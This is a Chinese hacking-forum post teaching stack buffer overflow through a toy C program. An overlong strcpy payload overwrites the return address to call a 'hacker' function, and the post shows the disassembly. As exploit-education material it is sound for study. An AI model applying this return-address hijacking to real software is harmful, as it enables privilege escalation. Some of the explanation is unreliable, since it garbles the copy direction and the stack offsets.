跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

  • 0

深入理解黑客攻击——缓冲区溢出攻击


HACK1949

问题

深入理解黑客攻击——缓冲区溢出攻击

5fea7ffab2c42.png

深入理解黑客攻击-缓冲区溢出攻击

嗨,各位粉丝好,你们有没有想过黑客是一群什么样的人?

u=2906384253,1154456655&fm=173&app=25&f=

他们是一群谁也不知道真实身份的人,他们可以是你、我、他当中的任何一个人

他们可以攻击也可以防御。游走在法律的边缘,看似邪恶却也充满正以,它可以使一个人,也可以是一群人他们是谁?

匿名者!

u=1067078728,1711759880&fm=173&app=25&f=

永远不要忘记,他可能就在我们之中

u=2509307664,589758149&fm=173&app=25&f=J

有人会问,难道真的没有什么系统完全能抵御黑客的攻击吗?

u=1654124183,507996427&fm=173&app=25&f=J

对,当然没有!因为漏洞在人身上,没有绝对安全的系统

攻防无绝对,技术无黑白

今天就来讲解一下黑客攻击的其中一部分——缓冲区溢出攻击

缓冲区溢出攻击呢是利用缓冲区溢出漏洞所进行的攻击行动

如果有人利用栈中分配的缓冲区写溢出,悄悄地将一段恶意代码的首地址

作为返回地址覆盖写到原先的正确的返回地址处。那么程序在执行ret的时候会悄悄地转移到这个恶意代码段处执行

从而可以轻易获得系统特权,进而进行各种非法操作

造成缓冲区溢出的原因就是系统没有对作为缓冲区的数组进行越界检查

u=88571093,1333768393&fm=173&app=25&f=JP

给出一段代码

#include <stdio.h>#include "string.h"void outputs(char *str){char buffer[16];strcpy(buffer,str);//str to bufferprintf("%s \n",buffer);}void hacker(void){printf("being hacked\n");}int main(int argc,char *argv[]){outputs("1234567123456712345671234567\\xaa\\x84\\x04\\x08");return 0;}

main函数调用outputs函数。

通过对main函数进行反汇编,可以得到

Dump of assembler code for function main: 0x080484be <+0>: push %ebp 0x080484bf <+1>: mov %esp,%ebp 0x080484c1 <+3>: and $0xfffffff0,%esp 0x080484c4 <+6>: sub $0x10,%esp 0x080484c7 <+9>: movl $0x8048584,(%esp) 0x080484ce <+16>: call 0x804847d <outputs> 0x080484d3 <+21>: mov $0x0,%eax 0x080484d8 <+26>: leave 0x080484d9 <+27>: ret

通过对outputs函数进行反汇编,可以得到

Dump of assembler code for function outputs: 0x0804847d <+0>: push %ebp 0x0804847e <+1>: mov %esp,%ebp 0x08048480 <+3>: sub $0x28,%esp 0x08048483 <+6>: mov 0x8(%ebp),%eax 0x08048486 <+9>: mov %eax,0x4(%esp) 0x0804848a <+13>: lea -0x18(%ebp),%eax 0x0804848d <+16>: mov %eax,(%esp) 0x08048490 <+19>: call 0x8048340 <strcpy@plt> 0x08048495 <+24>: lea -0x18(%ebp),%eax 0x08048498 <+27>: mov %eax,0x4(%esp) 0x0804849c <+31>: movl $0x8048570,(%esp) 0x080484a3 <+38>: call 0x8048330 <printf@plt> 0x080484a8 <+43>: leave 0x080484a9 <+44>: ret

可以看出,汇编代码

0x08048490 <+19>: call 0x8048340 <strcpy@plt>

是对应于c代码

strcpy(buffer,str);//str to buffer这一句的

那么strr[0]是对应于 0x0804848a <+13>: lea -0x18(%ebp),%eax这一句的

那么buffer[0]是对应于 0x08048483 <+6>: mov 0x8(%ebp),%eax这一句的

也就是说strcpy(buffer,str);这一条语句,就是将buffer数组赋值给str数组

而ebp+8的地址就是返回地址所在的内存地址的位置

所以我们必须将-0x18(%ebp)到4(%ebp)之间全部填充满

然后-4(%ebp)到8(%ebp)填充为我们想要程序返回的地址

这样函数outputs执行完毕以后,就会返回到我们想要返回的地址

通过对hacker进行反汇编

我们得到hacker函数的首地址

u=2426783034,54638824&fm=173&app=25&f=JP

如图所示,hacker函数的首地址为0x080484aa

那么我们就把esp+4到esp+8的区间填充为0x080484aa

u=2436856255,2350731927&fm=173&app=25&f=

可以看到,劫持成功了

以上内容就是对黑客攻击做一个简单的了解和介绍

你想像他们一样么?做一名白帽子,帮助安全厂商去修复漏洞吗。

链接帖子
意见的链接
分享到其他网站

这个问题有0个答案

推荐的帖子

此问题没有答案

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...